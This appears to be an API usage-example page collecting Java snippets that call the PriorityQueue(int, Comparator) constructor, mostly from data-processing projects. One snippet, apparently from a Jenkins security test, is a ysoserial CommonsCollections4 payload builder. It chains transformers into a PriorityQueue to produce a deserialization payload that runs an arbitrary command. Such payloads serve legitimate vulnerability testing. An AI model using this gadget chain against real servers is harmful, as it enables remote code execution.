Example usage for the java.util.PriorityQueue(int, Comparator) constructor

Introduction

On this page you can find usage examples of the java.util.PriorityQueue(int initialCapacity, Comparator<? super E> comparator) constructor.

Prototype

public PriorityQueue(int initialCapacity, Comparator<? super E> comparator) 

Documentation

Creates a PriorityQueue with the specified initial capacity that orders its elements according to the specified comparator.
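
Below is a minimal, self-contained sketch of this constructor. The capacity of 10, the string elements, and the length-based comparator are illustrative assumptions, not taken from the projects in the Usage section.

import java.util.Comparator;
import java.util.PriorityQueue;

public class PriorityQueueConstructorExample {
    public static void main(String[] args) {
        // Initial capacity of 10; order elements so that longer strings come out first.
        PriorityQueue<String> queue = new PriorityQueue<String>(10, new Comparator<String>() {
            @Override
            public int compare(String a, String b) {
                return Integer.compare(b.length(), a.length());
            }
        });

        queue.add("pear");
        queue.add("watermelon");
        queue.add("fig");

        // poll() drains the queue in comparator order: watermelon, pear, fig
        while (!queue.isEmpty()) {
            System.out.println(queue.poll());
        }
    }
}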

Usage

From source file:org.petalslink.dsb.federation.core.server.ServiceManagerImpl.java

/**
 * {@inheritDoc}
 */
public void start() {

    // first start the internal services...
    if (logger.isDebugEnabled()) {
        logger.debug("Starting internal services");
    }
    // Comparator here is presumably a project-local class implementing
    // java.util.Comparator<Service> defined elsewhere in this source file,
    // not the java.util.Comparator interface itself.
    PriorityQueue<Service> queue = new PriorityQueue<Service>(this.services.size(), new Comparator());
    for (String name : this.services.keySet()) {
        if ((this.services.get(name) != null) && (this.services.get(name).getType() == Service.TYPE.INTERNAL)) {
            queue.add(this.services.get(name));
        }
    }
    Service s = null;
    while ((s = queue.poll()) != null) {
        this.start(s.getName());
    }

    if (logger.isDebugEnabled()) {
        logger.debug("Starting *bound services");
    }
    queue = new PriorityQueue<Service>(this.services.size(), new Comparator());
    for (String name : this.services.keySet()) {
        if ((this.services.get(name) != null) && (this.services.get(name).getType() != Service.TYPE.INTERNAL)) {
            queue.add(this.services.get(name));
        }
    }
    while ((s = queue.poll()) != null) {
        this.start(s.getName());
    }
}

From source file:com.joliciel.csvLearner.features.BestFeatureFinder.java

public List<NameValuePair> getBestFeatures(GenericEvents events, String testOutcome, int featureCount) {
    LOG.debug("testOutcome: " + testOutcome);
    List<NameValuePair> bestFeatures = new ArrayList<NameValuePair>();

    RealValueFeatureEvaluator evaluator = new RealValueFeatureEvaluator();
    evaluator.setFeatureSplitter(featureSplitter);
    try {
        Set<String> features = events.getFeatures();

        PriorityQueue<NameValuePair> heap = new PriorityQueue<NameValuePair>(features.size(),
                new NameValueDescendingComparator());
        double eventSpaceEntropy = -1;
        for (String feature : features) {
            List<Double> featureEntropies = evaluator.evaluateFeature(events, feature, testOutcome);
            double informationGain = featureEntropies.get(0)
                    - featureEntropies.get(featureEntropies.size() - 1);
            if (eventSpaceEntropy < 0)
                eventSpaceEntropy = featureEntropies.get(0);
            NameValuePair pair = new NameValuePair(feature, informationGain);
            heap.add(pair);
        }
        bestFeatures.add(new NameValuePair(TOTAL_ENTROPY, eventSpaceEntropy));
        for (int i = 0; i < featureCount; i++) {
            NameValuePair pair = heap.poll();
            if (pair == null)
                break;
            LOG.debug("feature: " + pair.getName() + ", " + pair.getValue());

            bestFeatures.add(pair);
        }
        heap = null;
    } finally {
        evaluator.logPerformance();
    }
    return bestFeatures;
}

From source file:com.datatorrent.lib.util.TopNUniqueSort.java

/**
 * Constructs and sets values accordingly
 * @param initialCapacity
 * @param bound
 * @param flag
 */
public TopNUniqueSort(int initialCapacity, int bound, boolean flag) {
    ascending = flag;
    // Ascending use of pqueue needs a descending comparator
    q = new PriorityQueue<E>(initialCapacity, new ReversibleComparator<E>(flag));
    qbound = bound;
    hmap = new HashMap<E, MutableInt>();
}

From source file:EntityClustering.MarkovClustering.java

@Override
public List<EquivalenceCluster> getDuplicates(SimilarityPairs simPairs) {
    initializeGraph(simPairs);
    SimilarityEdgeComparator SEcomparator = new SimilarityEdgeComparator();
    PriorityQueue<SimilarityEdge> SEqueue = new PriorityQueue<SimilarityEdge>(simPairs.getNoOfComparisons(),
            SEcomparator);
    // add an edge for every pair of entities with a weight higher than the threshold
    double threshold = getSimilarityThreshold(simPairs);
    Iterator<Comparison> iterator = simPairs.getPairIterator();
    double[][] simMatrix = new double[noOfEntities][noOfEntities];
    while (iterator.hasNext()) {
        Comparison comparison = iterator.next();
        if (threshold < comparison.getUtilityMeasure()) {
            simMatrix[comparison.getEntityId1()][comparison.getEntityId2() + datasetLimit] = comparison
                    .getUtilityMeasure();
        }
    }
    addSelfLoop(simMatrix);
    Normalize(simMatrix);
    double[][] atStart = new double[noOfEntities][noOfEntities];
    int count = 0;
    do {
        for (int i = 0; i < noOfEntities; i++)
            for (int j = 0; j < noOfEntities; j++)
                atStart[i][j] = simMatrix[i][j];
        expand2(simMatrix);
        Normalize(simMatrix);
        Hadamard(simMatrix, 2);
        Normalize(simMatrix);
        count++;

    } while ((!areSimilar(atStart, simMatrix)) && (count < similarityChecksLimit));

    int n1 = simMatrix.length;
    int upLimit = n1;
    int lowLimit = 0;
    if (datasetLimit != 0) {
        upLimit = datasetLimit;
        lowLimit = datasetLimit;
    }
    for (int i = 0; i < upLimit; i++) {
        for (int j = lowLimit; j < n1; j++) {
            int v1 = i;
            int v2 = j;
            double sim = Math.max(simMatrix[i][j], simMatrix[j][i]);
            if ((sim > clusterThreshold) && (i != j)) {
                similarityGraph.addEdge(v1, v2);
            }
        }
    }

    // get connected components
    ConnectivityInspector ci = new ConnectivityInspector(similarityGraph);
    List<Set<Integer>> connectedComponents = ci.connectedSets();

    // prepare output
    List<EquivalenceCluster> equivalenceClusters = new ArrayList<>();
    for (Set<Integer> componentIds : connectedComponents) {
        EquivalenceCluster newCluster = new EquivalenceCluster();
        equivalenceClusters.add(newCluster);
        if (!simPairs.isCleanCleanER()) {
            newCluster.loadBulkEntityIdsD1(componentIds);
            continue;
        }

        for (Integer entityId : componentIds) {
            if (entityId < datasetLimit) {
                newCluster.addEntityIdD1(entityId);
            } else {
                newCluster.addEntityIdD2(entityId - datasetLimit);
            }
        }

    }
    return equivalenceClusters;
}

From source file:org.apache.mahout.classifier.bayes.algorithm.BayesAlgorithm.java

@Override
public ClassifierResult[] classifyDocument(String[] document, Datastore datastore, String defaultCategory,
        int numResults) throws InvalidDatastoreException {
    Collection<String> categories = datastore.getKeys("labelWeight");
    PriorityQueue<ClassifierResult> pq = new PriorityQueue<ClassifierResult>(numResults,
            new ByScoreLabelResultComparator());
    for (String category : categories) {
        double prob = documentWeight(datastore, category, document);
        if (prob > 0.0) {
            pq.add(new ClassifierResult(category, prob));
            if (pq.size() > numResults) {
                pq.remove();
            }
        }
    }

    if (pq.isEmpty()) {
        return new ClassifierResult[] { new ClassifierResult(defaultCategory, 0.0) };
    } else {
        List<ClassifierResult> result = new ArrayList<ClassifierResult>(pq.size());
        while (!pq.isEmpty()) {
            result.add(pq.remove());
        }
        Collections.reverse(result);
        return result.toArray(new ClassifierResult[pq.size()]);
    }
}

From source file:com.aliyun.odps.mapred.local.MapOutputBuffer.java

public MapOutputBuffer(JobConf conf, int reduceNum) {

    Column[] key = conf.getMapOutputKeySchema();
    if (key != null) {
        String[] partCols = conf.getPartitionColumns();
        this.partColIdxs = new int[partCols.length];
        Map<String, Integer> reverseLookupMap = new HashMap<String, Integer>();
        int i = 0;
        for (Column c : key) {
            reverseLookupMap.put(c.getName(), i);
            i++;
        }
        i = 0;
        for (String col : partCols) {
            partColIdxs[i++] = reverseLookupMap.get(col);
        }

        numReduce = reduceNum;
        String[] sortColumns = conf.getOutputKeySortColumns();
        SortOrder[] sortOrders = conf.getOutputKeySortOrder();
        comparator = new LocalColumnBasedRecordComparator(sortColumns, key, sortOrders);
        buffers = new ArrayList<PriorityQueue<Object[]>>(numReduce);
        for (i = 0; i < numReduce; i++) {
            buffers.add(new PriorityQueue<Object[]>(16, comparator));
        }
    }

}

From source file:org.apache.hadoop.hdfs.server.namenode.TestFileJournalManager.java

/**
 * Find out how many transactions we can read from a
 * FileJournalManager, starting at a given transaction ID.
 *
 * @param jm              The journal manager
 * @param fromTxId        Transaction ID to start at
 * @param inProgressOk    Should we consider edit logs that are not finalized?
 * @return                The number of transactions
 * @throws IOException
 */
static long getNumberOfTransactions(FileJournalManager jm, long fromTxId, boolean inProgressOk,
        boolean abortOnGap) throws IOException {
    long numTransactions = 0, txId = fromTxId;
    final PriorityQueue<EditLogInputStream> allStreams = new PriorityQueue<EditLogInputStream>(64,
            JournalSet.EDIT_LOG_INPUT_STREAM_COMPARATOR);
    jm.selectInputStreams(allStreams, fromTxId, inProgressOk);
    EditLogInputStream elis = null;
    try {
        while ((elis = allStreams.poll()) != null) {
            try {
                elis.skipUntil(txId);
                while (true) {
                    FSEditLogOp op = elis.readOp();
                    if (op == null) {
                        break;
                    }
                    if (abortOnGap && (op.getTransactionId() != txId)) {
                        LOG.info("getNumberOfTransactions: detected gap at txId " + fromTxId);
                        return numTransactions;
                    }
                    txId = op.getTransactionId() + 1;
                    numTransactions++;
                }
            } finally {
                IOUtils.cleanup(LOG, elis);
            }
        }
    } finally {
        IOUtils.cleanup(LOG, allStreams.toArray(new EditLogInputStream[0]));
    }
    return numTransactions;
}

From source file:org.apache.hadoop.hive.ql.exec.tez.tools.KeyValueInputMerger.java

public KeyValueInputMerger(List<KeyValueReader> multiMRInputs, Deserializer deserializer,
        ObjectInspector[] inputObjInspectors, List<String> sortCols) throws Exception {
    //get KeyValuesReaders from the LogicalInput and add them to priority queue
    int initialCapacity = multiMRInputs.size();
    pQueue = new PriorityQueue<KeyValueReader>(initialCapacity, new KVReaderComparator());
    this.inputObjInspectors = inputObjInspectors;
    this.deserializer = deserializer;
    fieldOIs = new ArrayList<ObjectInspector>();
    structFields = new ArrayList<StructField>();
    StructObjectInspector structOI = (StructObjectInspector) inputObjInspectors[0];
    for (String field : sortCols) {
        StructField sf = structOI.getStructFieldRef(field);
        structFields.add(sf);
        ObjectInspector stdOI = ObjectInspectorUtils.getStandardObjectInspector(sf.getFieldObjectInspector());
        fieldOIs.add(stdOI);
    }
    l4j.info("Initialized the priority queue with multi mr inputs: " + multiMRInputs.size());
    for (KeyValueReader input : multiMRInputs) {
        addToQueue(input);
    }
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java

public Queue<Object> getObject(final String command) throws Exception {
    Object templates = Gadgets.createTemplatesImpl(command);

    ConstantTransformer constant = new ConstantTransformer(String.class);

    // mock method name until armed
    Class[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args);

    // grab defensively copied arrays
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

    // create queue with numbers
    PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
    queue.add(1);
    queue.add(1);

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return queue;
}

From source file:org.apache.hadoop.tools.rumen.DeskewedJobTraceReader.java

/**
 * Constructor.
 * 
 * @param reader
 *          the {@link JobTraceReader} that's being protected
 * @param skewBufferLength
 *          the number of late jobs that can precede a later out-of-order
 *          earlier job
 * @throws IOException
 */
public DeskewedJobTraceReader(JobTraceReader reader, int skewBufferLength, boolean abortOnUnfixableSkew)
        throws IOException {
    this.reader = reader;

    this.skewBufferLength = skewBufferLength;

    this.abortOnUnfixableSkew = abortOnUnfixableSkew;

    skewBuffer = new PriorityQueue<LoggedJob>(skewBufferLength + 1, new JobComparator());

    fillSkewBuffer();
}